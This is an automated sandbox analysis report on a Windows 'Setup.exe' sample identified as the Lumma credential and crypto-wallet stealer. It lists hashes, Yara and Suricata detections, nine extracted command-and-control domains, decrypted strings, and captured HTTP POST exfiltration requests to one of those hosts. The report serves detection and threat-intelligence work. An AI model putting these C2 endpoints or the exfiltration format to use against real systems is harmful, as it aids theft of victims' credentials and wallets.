Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:Setup.exe
Analysis ID:1580155
MD5:95fb898ccbb30cc75342f7afca4d6fa7
SHA1:85caaaeab8f4bc0be8d29002081fbce0c37820fe
SHA256:ce6becb9c924feaa5d1b27fa38252d24f3447562317bc2b1ba261d771b50e628
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Setup.exe (PID: 5064 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 95FB898CCBB30CC75342F7AFCA4D6FA7)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["necklacebudi.lat", "aspecteirs.lat", "cheapptaxysu.click", "crosshuaht.lat", "grannyejh.lat", "discokeyus.lat", "energyaffai.lat", "rapeflowwj.lat", "sustainskelet.lat"], "Build id": "CZJvss--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1924884334.0000000000B86000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1948547034.0000000000B8F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
          • 0x4c942:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
          • 0x4fed8:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
          Process Memory Space: Setup.exe PID: 5064JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: Setup.exe PID: 5064JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 2 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T02:59:11.705797+010020283713Unknown Traffic192.168.2.449731172.67.177.88443TCP
              2024-12-24T02:59:13.384040+010020283713Unknown Traffic192.168.2.449732172.67.177.88443TCP
              2024-12-24T02:59:15.763280+010020283713Unknown Traffic192.168.2.449734172.67.177.88443TCP
              2024-12-24T02:59:18.097450+010020283713Unknown Traffic192.168.2.449736172.67.177.88443TCP
              2024-12-24T02:59:20.402504+010020283713Unknown Traffic192.168.2.449739172.67.177.88443TCP
              2024-12-24T02:59:22.990797+010020283713Unknown Traffic192.168.2.449741172.67.177.88443TCP
              2024-12-24T02:59:25.708628+010020283713Unknown Traffic192.168.2.449743172.67.177.88443TCP
              2024-12-24T02:59:29.504298+010020283713Unknown Traffic192.168.2.449744172.67.177.88443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T02:59:12.138300+010020546531A Network Trojan was detected192.168.2.449731172.67.177.88443TCP
              2024-12-24T02:59:14.151154+010020546531A Network Trojan was detected192.168.2.449732172.67.177.88443TCP
              2024-12-24T02:59:30.269322+010020546531A Network Trojan was detected192.168.2.449744172.67.177.88443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T02:59:12.138300+010020498361A Network Trojan was detected192.168.2.449731172.67.177.88443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T02:59:14.151154+010020498121A Network Trojan was detected192.168.2.449732172.67.177.88443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T02:59:18.931023+010020480941Malware Command and Control Activity Detected192.168.2.449736172.67.177.88443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: Setup.exe.5064.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["necklacebudi.lat", "aspecteirs.lat", "cheapptaxysu.click", "crosshuaht.lat", "grannyejh.lat", "discokeyus.lat", "energyaffai.lat", "rapeflowwj.lat", "sustainskelet.lat"], "Build id": "CZJvss--"}
              Source: Setup.exeVirustotal: Detection: 34%Perma Link
              Source: Setup.exeReversingLabs: Detection: 36%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
              Source: 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
              Source: 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmpString decryptor: crosshuaht.lat
              Source: 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmpString decryptor: sustainskelet.lat
              Source: 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmpString decryptor: aspecteirs.lat
              Source: 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmpString decryptor: energyaffai.lat
              Source: 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmpString decryptor: necklacebudi.lat
              Source: 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmpString decryptor: discokeyus.lat
              Source: 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmpString decryptor: grannyejh.lat
              Source: 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmpString decryptor: cheapptaxysu.click
              Source: 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmpString decryptor: CZJvss--
              Source: Setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49744 version: TLS 1.2

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49736 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 172.67.177.88:443
              Source: Malware configuration extractorURLs: necklacebudi.lat
              Source: Malware configuration extractorURLs: aspecteirs.lat
              Source: Malware configuration extractorURLs: cheapptaxysu.click
              Source: Malware configuration extractorURLs: crosshuaht.lat
              Source: Malware configuration extractorURLs: grannyejh.lat
              Source: Malware configuration extractorURLs: discokeyus.lat
              Source: Malware configuration extractorURLs: energyaffai.lat
              Source: Malware configuration extractorURLs: rapeflowwj.lat
              Source: Malware configuration extractorURLs: sustainskelet.lat
              Source: Joe Sandbox ViewIP Address: 172.67.177.88 172.67.177.88
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 172.67.177.88:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cheapptaxysu.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=hQv64SvizH_hIw.gtxtZwh7O0y57R_Bbkxkmg0Nx3b0-1735005551-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: cheapptaxysu.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2DI73TQIR9GCookie: __cf_mw_byp=hQv64SvizH_hIw.gtxtZwh7O0y57R_Bbkxkmg0Nx3b0-1735005551-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18116Host: cheapptaxysu.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VE81SLGBJTH2XMHCookie: __cf_mw_byp=hQv64SvizH_hIw.gtxtZwh7O0y57R_Bbkxkmg0Nx3b0-1735005551-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8761Host: cheapptaxysu.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PG9JI3AQCookie: __cf_mw_byp=hQv64SvizH_hIw.gtxtZwh7O0y57R_Bbkxkmg0Nx3b0-1735005551-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20372Host: cheapptaxysu.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JRYC9AD8ZYY30IA3JQCookie: __cf_mw_byp=hQv64SvizH_hIw.gtxtZwh7O0y57R_Bbkxkmg0Nx3b0-1735005551-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1248Host: cheapptaxysu.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TD2422N4K731TZUB2ZNCookie: __cf_mw_byp=hQv64SvizH_hIw.gtxtZwh7O0y57R_Bbkxkmg0Nx3b0-1735005551-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551180Host: cheapptaxysu.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=hQv64SvizH_hIw.gtxtZwh7O0y57R_Bbkxkmg0Nx3b0-1735005551-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: cheapptaxysu.click
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: cheapptaxysu.click
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cheapptaxysu.click
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 24 Dec 2024 01:59:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6tRfy80K44znX6EcXtDgMzrzeSwfcGqoQG0mTVU%2FKB7tGTPhxs3QGwNwzbgexTnmYkkH%2FyU9a6vfS%2BaiGNtayeq%2FXR%2BreKl%2BntN7FlxxRGn%2BcoTmiT%2FyhghrOQ%2Fs3%2Fr7MSYROMc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f6cfd9bd84cc47a-EWR
              Source: Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: Setup.exe, 00000000.00000003.1900337067.0000000003594000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Setup.exe, 00000000.00000003.1900337067.0000000003594000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: Setup.exe, 00000000.00000003.1900337067.0000000003594000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: Setup.exe, 00000000.00000003.1900337067.0000000003594000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Setup.exe, 00000000.00000003.1900337067.0000000003594000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: Setup.exe, 00000000.00000003.1900337067.0000000003594000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: Setup.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: Setup.exe, 00000000.00000003.1900337067.0000000003594000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: Setup.exeString found in binary or memory: http://ocsp.digicert.com0
              Source: Setup.exeString found in binary or memory: http://ocsp.digicert.com0A
              Source: Setup.exeString found in binary or memory: http://ocsp.digicert.com0C
              Source: Setup.exeString found in binary or memory: http://ocsp.digicert.com0X
              Source: Setup.exe, 00000000.00000003.1900337067.0000000003594000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Setup.exeString found in binary or memory: http://www.digicert.com/CPS0
              Source: Setup.exeString found in binary or memory: http://www.dk-soft.org/
              Source: Setup.exe, 00000000.00000003.1900337067.0000000003594000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: Setup.exe, 00000000.00000003.1900337067.0000000003594000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: Setup.exe, 00000000.00000003.1855051726.00000000035AD000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1854951005.00000000035AF000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855160719.00000000035AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: Setup.exe, 00000000.00000003.1902259119.000000000356F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: Setup.exe, 00000000.00000003.1925122513.0000000003568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
              Source: Setup.exe, 00000000.00000003.1855051726.00000000035AD000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1854951005.00000000035AF000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855160719.00000000035AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Setup.exe, 00000000.00000003.1855051726.00000000035AD000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1854951005.00000000035AF000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855160719.00000000035AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Setup.exe, 00000000.00000003.1855051726.00000000035AD000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1854951005.00000000035AF000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855160719.00000000035AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Setup.exe, 00000000.00000002.2014413389.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1853982813.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1992831324.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968748847.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1925122513.0000000003568000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2014507406.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1948547034.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1967648591.0000000000B7A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1993015186.0000000000B7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/
              Source: Setup.exe, 00000000.00000003.1853982813.0000000000B77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/Q
              Source: Setup.exe, 00000000.00000002.2013850963.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968748847.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1877874726.0000000003566000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2013850963.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1853982813.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1878004622.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1948547034.0000000000B31000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1993073518.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1925313791.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1924884334.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1926828202.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1948547034.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1853982813.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1899812854.0000000003572000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1831909637.0000000000B2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/api
              Source: Setup.exe, 00000000.00000003.1853982813.0000000000B44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/api1pd
              Source: Setup.exe, 00000000.00000003.1877874726.0000000003566000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1878004622.0000000003570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/apiB
              Source: Setup.exe, 00000000.00000003.1967648591.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968748847.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1993073518.0000000000B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/apiMXNc
              Source: Setup.exe, 00000000.00000003.1924862652.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1925122513.0000000003571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/apih
              Source: Setup.exe, 00000000.00000003.1853982813.0000000000B44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/apisp
              Source: Setup.exe, 00000000.00000003.1853982813.0000000000B77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/y
              Source: Setup.exe, 00000000.00000003.1967648591.0000000000B46000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968748847.0000000000B45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click:443/api
              Source: Setup.exe, 00000000.00000003.1902259119.000000000356F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: Setup.exe, 00000000.00000003.1902259119.000000000356F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: Setup.exe, 00000000.00000003.1855051726.00000000035AD000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1854951005.00000000035AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Setup.exe, 00000000.00000003.1855051726.00000000035AD000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1854951005.00000000035AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Setup.exe, 00000000.00000003.1855051726.00000000035AD000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1854951005.00000000035AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Setup.exe, 00000000.00000003.1902259119.000000000356F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: Setup.exe, 00000000.00000003.1855536746.00000000035C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: Setup.exe, 00000000.00000003.1901821768.000000000368C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Setup.exe, 00000000.00000003.1901821768.000000000368C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Setup.exe, 00000000.00000003.1878218138.00000000035BB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855536746.00000000035C2000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1877972918.00000000035BB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855671839.00000000035BB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1877742491.00000000035BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: Setup.exe, 00000000.00000003.1855671839.0000000003596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
